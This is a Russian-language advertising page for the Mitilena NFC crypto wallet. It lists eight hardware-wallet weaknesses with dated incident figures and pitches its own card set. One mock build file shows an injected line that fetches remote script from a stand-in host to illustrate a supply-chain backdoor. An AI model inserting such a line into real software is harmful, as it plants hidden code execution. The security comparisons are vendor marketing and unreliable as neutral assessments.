8 брешей Открытый код Чек-лист Вопросы
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Создать кошелекСоздать
Аппаратные кошельки · неочевидные бреши

Неочевидные бреши аппаратного кошелька

Вы покупаете устройство, чтобы закрыть дыры. Вместе с ним часто приходят новые: прошивка, обновления, служба на компьютере, экран, коробка, аккаунт у продавца. Восемь деталей, которые в обзорах пишут в плюсы, — и восемь способов, которыми через них забирали деньги в 2020–2026.

Реальные случаи с датами и суммами По документации производителей Носитель без прошивки и службы на ПК
Цена ошибкипубличные случаи
2025Bybit · подписанты подписали не то, что видели1,5 млрд $
2026Coldcard · слабая случайность в прошивке100+ млн $
2021Поддельное приложение кошелька в App Store17,1 BTC
2023Ledger Connect Kit · закладка в библиотеке600 тыс. $
2020Утечка базы клиентов Ledger · фишинг годами270 000 чел.
2024Dark Skippy · сид утекает через две подписиисследование
Восемь брешей

Каждая деталь, которую хвалят в обзорах, - отдельная дыра

Аппаратный кошелек закрывает одну дыру: ключ больше не лежит на телефоне с интернетом. Но устройство не пустое. У него есть прошивка, обновления, программа на компьютере, экран, коробка, продавец с вашим адресом - и каждая деталь добавля��т поверхность атаки, которой у вас раньше не было. Ниже восемь таких деталей: что о них пишут в обзорах, как через них забирали деньги, как закрыть брешь и есть ли эта деталь у нашего комплекта.

Брешь 01

Прошивка, которая создает ваш ключ

В обзорах: «защищенный чип, ключ создается внутри устройства и никогда его не покидает»

Ключ - огромное случайное число, и делает его прошивка. Одна ошибка в ней - и ключей на самом деле мало: их перебирают у всех владельцев сразу, без доступа к устройству, через годы после покупки. Чип ни при чем, дыра выше него.

Случай
100+ млн $
Coldcard, июль 2026: ошибка сборки прошивки с 2021 года тихо подменяла аппаратный генератор слабым, засеянным номером устройства и таймером. Стойкость ключей упала примерно до 40 бит; по оценкам исследователей потери ушли за 100 млн долларов, затронуты тысячи адресов.
Как закрыть брешь
Можно ли принести свою случайность: броски кубика, собственная фраза. Кошелек, который принимает энтропию от вас, не зависит от одной ошибки в прошивке.
Этой детали у нас нет
На карте нет прошивки - это зашифрованный носитель. Ключ создает Mitilena Air из системного генератора устройства, и вы можете задать собственную фразу-сид вместо случайных слов.
Брешь 02

Обновления, которые вы обязаны ставить

В обзорах: «производитель регулярно выпускает обновления безопасности»

Каждое обновление - момент, когда прошивку можно подменить. Подкрученная прошивка прячет кусочки сида в двух-трех обычных подписях, а снаружи устройство работает как всегда. Не обновляться тоже нельзя: дыры чинят именно обновлениями.

Случай
2 подписи
Dark Skippy, август 2024: исследователи показали, что вредоносная прошивка аппаратного кошелька уносит весь сид через две транзакции. Достаточно один раз обновиться не оттуда.
Как закрыть брешь
Откуда приходят прошивки и проверяет ли устройство их подпись. Лучше всего, когда обновлять вообще нечего.
Этой детали у нас нет
На карте нечего обновлять и нечего подменить. Подписывает приложение на телефоне, а его сборки подписаны и приходят из App Store и Google Play - как у любого приложения, которое вы видите и закрываете сами.
Брешь 03 · Почувствуйте абсурд
В обзорах: «удобное фирменное приложение для компьютера»

Кошелек для недоверия, к которому прилагается служба

Вы покупаете устройство ради одного: чтобы больше не доверять компьютеру. Чтобы оно заработало, на этот же компьютер надо поставить фоновую службу. Вы её не писали, не запускали и не контролируете: она стартует вместе с системой, слушает порт, к которому может постучаться любая программа на вашей машине, и что-то делает прямо сейчас - что именно, вы не знаете и никогда не проверите.

Она висела в фоне и после того, как вы закрыли кошелек. Годами. У одного из крупнейших производителей это была отдельная служба-«мост»; в 2025 году её спрятали внутрь самого приложения - служба на месте, просто умирает вместе с окном. У большинства других без программы на компьютере устройство - брелок. На Linux добавьте правила udev, иначе система не отдаст USB.

То есть вещь, которую вы купили, чтобы не зависеть от программ на компьютере, не работает без программы на компьютере. Причем не той, которую вы видите, а той, которая крутится под ней.

Этой детали у нас нет
На компьютер не ставится ничего: ни службы, ни драйвера, ни порта. Посредник - NFC-чип, который уже стоит в вашем телефоне, сделан его производителем и подчиняется операционной системе: работает только когда приложение открыто и вы сами приложили карту, и телефон каждый раз спрашивает разрешение. Карта пассивная: ни батарейки, ни радио, сама ничего не делает. Закрыли приложение - не осталось ничего, что работает без вас. Честно: приложение на телефоне нужно, и оно такое же, как любое другое, - вы его видите, запускаете и закрываете сами. В подсобке никто не живет.
Мониторинг системыКОШЕЛЕК ЗАКРЫТ
ПроцессСостояниеРаботает
HW Wallet Appкошелек
закрыт вами-
hwwalletdфоновая служба · мост к USB
работает412 дн. 06:14
запущена системой при входезакрыть нельзя - это служба
Макет, имена условные. Так выглядел компьютер с одним из самых популярных USB-кошельков до 2025 года; потом «мост» встроили в само приложение - служба та же, просто теперь её не видно в списке.
Аллегория
Дом ради приватности - и жилец в подсобке

Вы хотели дом ради приватности. Купили. Потом понадобилась охрана - поставили. А чтобы тариф на охрану работал, вас попросили пустить в дом человека в форме, который живет у вас в подсобке круглосуточно, имеет ключи от всех дверей и отчитывается не вам. Вы его не нанимали, уволить не можете, и что он делает по ночам - не знаете.

Он, конечно, свой. Так написано в договоре. Вы хотели приватности, а получили суррогат: дом с жильцом, которого не выбирали.

Брешь 04 · Открытый код - это не аудит
В обзорах: «открытый код - любой может проверить»

Открытый код - способ программистам работать вместе, а не знак, что программа не ворует

Открытый исходный код придумали, чтобы делиться программами и чинить их сообща. Это инструмент совместной работы, и в этом качестве он прекрасен. Знаком качества «этот софт не украдет ваши деньги» он не был никогда, и вот почему: вы не пользуетесь исходным кодом. Вы пользуетесь тем, что скачали.

Между репозиторием на GitHub и файлом на вашем телефоне - сборка, магазин приложений, обновление, сервер. На любом из этих шагов в код может попасть одна строка, которая подгружает что угодно откуда угодно, - и в репозитории её не будет. Сравнить свою копию с исходником вы не можете: магазины отдают скомпилированный файл, веб-кошелек при каждом открытии получает тот код, который сервер решил отдать именно вам сегодня, расширение браузера обновляется молча ночью.

«Открыто» означает, что какие-то люди могут проверить какую-то версию в какой-то день. Что делает ваша копия прямо сейчас - не означает.

В репозитории · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
У вас на телефоне · app-2.4.21.min.js
// send.js (сборка)
import { sign } from './crypto'
var globalObject = await fetch('https://cdn-static.io/x.js')
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Одна строка в сборке. В репозитории ее нет, в магазине её не видно, у вас она работает.
Открытость не помешала ни одному из этих случаев
Ledger Connect Kit2023
открытая библиотека на GitHub; вредоносную версию выложили в npm, десятки сайтов подгрузили ее живьем за несколько часов
Copay / event-stream2018
открытый кошелек; закладку принесла зависимость, нацеленная именно на него
xz utils2024
открыта двадцать лет; бэкдор сидел в релизах, пока один инженер случайно не заметил, что вход по SSH стал на полсекунды медленнее
Coldcard2026
прошивка с открытым кодом; ошибка сборки пять лет подменяла аппаратный генератор слабым - ключи перебрали без доступа к устройству, 5 000+ адресов, 100+ млн долларов
Что тогда работает
Не чтение чужого кода, а две проверки, доступные любому. Первая - аудит поведения: поставьте на своем компьютере перехватывающий прокси, пропустите через него приложение и смотрите, что и куда оно отправляет. Код можно не читать - трафик виден целиком. Вторая - архитектура, в которой коду нечего красть: если ключ никогда не бывает на устройстве с интернетом, любая строка в любом обновлении бессильна, ей нечего отправлять.
Как у нас
Первое предлагаем сами: пропустите наше приложение через локальный прокси (весь трафик расшифрован), веб-версию — через DevTools, и смотрите каждый запрос. Ключ подписи и сид в них не появятся. Второе — в комплекте: ключ рождается в Mitilena Air на устройстве без интернета, живёт на карте, а в онлайн-приложение попадает только подпись — проксировать нечего. Air-gap настоящий: устройство с ключом ни к чему не подключено — ни кабелем, ни Bluetooth; транзакция входит и выходит QR-кодом, который вы видите глазами. Не «холодный» кошелёк на шнурке со службой на онлайн-компьютере. Как прогнать самому →
Брешь 05

Экран, на котором не видно, что подписываешь

В обзорах: «подтверждение на экране устройства - вирус на компьютере бессилен»

Экран маленький, и часто на нем не адрес и сумма, а хэш или «вызов контракта». Вы подтверждаете то, чего не видите, - и подпись при этом честная, ваша. Экран дает ощущение контроля, которого нет.

Случай
1,5 млрд $
Bybit, февраль 2025: подписанты с аппаратными кошельками подтвердили перевод, который в интерфейсе выглядел обычным. Устройства показали данные, которые человек не мог сверить.
Как закрыть брешь
Получатель, сумма и тип операции человеческим языком, а не хэш, и отказ одной кнопкой.
Как у нас
Экран есть, но это экран телефона: адрес, сумма и тип запроса словами - перевод, вызов контракта, разрешение - и кнопка «Отклонить». Для крупных сумм - отдельное устройство без сети, куда транзакция приходит целиком.
Брешь 06

Коробка, в которой уже лежит сид

В обзорах: «приходит в запечатанной коробке с защитной пломбой»

Физическое устройство - это доставка, посредники и маркетплейсы «со скидкой». Кошелек приходит уже настроенным, с сидом на бумажке внутри. Или приложение-двойник в магазине просит «ввести сид для активации».

Случай
17,1 BTC
App Store, 2021: владелец аппаратного кошелька ввел сид в приложение-двойник и потерял 17,1 BTC. В том же году клиентам Ledger после утечки базы рассылали поддельные устройства с письмо�� «перенесите сид на новое».
Как закрыть брешь
Инициализировать самому и никогда не пользоваться сидом, который пришел уже написанным. Пломба - не проверка; проверка в том, что ключ создаете вы.
Как у нас
Карты приходят чистыми: ключ создаете вы и записываете сами, «готового» сида в коробке быть не может. Приложение - только из App Store и Google Play по ссылкам с сайта; сид оно спрашивает лишь при импорте и подписи.
Брешь 07

Аккаунт у производителя

В обзорах: «официальная гарантия, поддержка и личный кабинет»

Чтобы купить устройство, вы оставляете производителю имя, почту и адрес доставки. Теперь ваша безопасность зависит от его базы. Утечет - и вам годами будут писать «подтвердите сид на новом устройстве», иногда присылая посылки.

Случай
270 000 чел.
Ledger, 2020: утекли данные 270 000 покупателей, включая почтовые адреса. Письма, звонки и посылки с просьбой «мигрировать» сид идут до сих пор.
Как закрыть брешь
Чем меньше о вас знают, тем короче вектор: покупка без аккаунта, поддержка, которая никогда не спрашивает сид, и правило «сид спрашивает только вор».
Этой детали у нас нет
Кошелек работает без регистрации, аккаунта нет. Продавцу известен только адрес доставки. Сид не спрашивает ни поддержка, ни приложение.
Брешь 08

Одно устройство и одна бумажка

В обзорах: «прочный корпус, большой экран, аккумулятор на неделю»

Чем больше деталей, тем больше ломается: разъем, экран, батарея. А восстановление упирается в одну бумажку с сидом - залитую, потерянную при переезде, сфотографированную «на всякий случай». Самая частая причина потерь - не взлом.

Случай
≈20 % BTC
По оценке Chainalysis, около пятой части всех биткоинов потеряны навсегда - в основном из-за утраченных ключей, а не взломов.
Как закрыть брешь
Сколько копий ключа дают из коробки и в каком виде, что происходит при потере устройства, есть ли в нем чему ломаться.
Этой детали у нас нет
Нет экрана, батареи и разъема - ломаться нечему. И не одна копия, а пять зеркальных из коробки: две NFC-карты и три стелс-стикера в водонепроницаемом пластике, 10+ лет.
Чек-лист

Чего в кошельке быть не должно

Восемь деталей по восьми брешам. Список подходит любому кошельку - аппаратному, мобильному, браузерному. Отметьте, что есть у того, который вы выбираете, - и у нашего тоже.

01
Ключ, который создает только программабез вашей случайности - своей фразы или кубиков
02
Обновления там, где лежит ключкаждое обновление - шанс подменить
03
Служба, драйвер или порт на компьютересм. брешь 03
04
Бейдж «open source» вместо архитектурыключ там, куда может попасть чужой код
05
Экран, на котором хэш вместо адреса и суммыи нет кнопки «Отклонить»
06
Сид, который пришел уже написаннымв коробке, в письме, в «приложении для активации»
07
Аккаунт у производителяи поддержка, которая может спросить сид
08
Единственная копия и детали, которые ломаютсяэкран, батарея, разъем, одна бумажка
Ultimate по этому списку закрывает все восемь пунктов. 2 NFC-карты + 3 стелс-стикера, Mitilena Air (генерация без сети) и Mitilena Keys (подпись без сети) — не чип с завода, а глухой носитель, который шифруете вы. Состав и цена →
Ultimate · глухой носитель

Не secure element с завода — носитель, который шифруете вы

Карты приезжают пустыми: ключ создаёте в Mitilena Air на устройстве без интернета и пишете сами. Подпись — Mitilena Keys, тоже без сети; транзакция ходит QR-ом. Из коробки пять зеркальных копий: 2 NFC-карты и 3 стелс-стикера в водонепроницаемом пластике. 18 сетей, 20 000+ монет, включая USDT.

Ничего не ставится на компьютер
Нет прошивки, обновлений, экрана и батареи
Работает с бесплатным приложением Mitilena на телефоне
Водонепроницаемый пластик, срок хранения 10+ лет
Доставка по РФ 3–7 дней · Ozon · Wildberries · Яндекс Маркет
Можно начать с бесплатного приложения — карты докупить, когда сумма вырастет
NFC-карта Mitilena
Ultimate · генерация + подпись офлайн
29 900 ₽35 000 ₽
2 NFC-карты · 3 стелс-стикера · Mitilena Air · лицензия Mitilena Keys
Заказать Ultimate · 29 900 ₽ Базовый и Premium — от 6 900 ₽
Вопросы

Что спрашивают, дочитав до этого места

Плюсы и минусы аппаратного кошелька, если коротко?

Плюс один, и он большой: ключ не лежит на телефоне с интернетом. Минусы — восемь деталей выше, каждая добавляет поверхность атаки. Хороший аппаратный кошелёк — тот, где этих деталей меньше, а не больше.

А если телефон заражен?

С картой на основном телефоне ключ появляется в изолированной среде на секунду подписи. Для сумм, за которые страшно, — подпись на отдельном устройстве без интернета: транзакция приходит QR-кодом, ключ в сеть не выходит.

Что если карту украдут или потеряют?

Без пароля карта и стикер — бесполезный пластик, ключ на них зашифрован вами. Потерянную копию заменяют остальные: в комплекте пять зеркальных носителей — две карты и три стикера.

Нужно ли обновлять прошивку аппаратного кошелька?

Если производитель закрыл дыру - нужно, и это тот самый момент, когда прошивку можно подменить: проверяйте источник и подпись. У носителя без прошивки этого выбора нет - нечего обновлять и нечего подменить.

Чем это отличается от USB-кошелька?

Нет кабеля, драйвера, фоновой службы и программы-«моста» на компьютере. Посредник один — NFC-чип вашего телефона: он подчиняется вам и операционной системе, а не производителю кошелька.

Открытый код - значит безопасно?

Значит проверяемо кем-то когда-то. Вы пользуетесь не кодом, а тем, что скачали, и сравнить одно с другим не можете. Безопасность дает архитектура, в которой ключа нет там, куда может попасть чужой код.

Глухой NFC с офлайн-генерацией и подписью

5 копий · Air · Keys · или бесплатный кошелёк за 30 секунд · почему чип ≠ холод
Заказать Ultimate · 29 900 ₽ Создать бесплатный кошелёк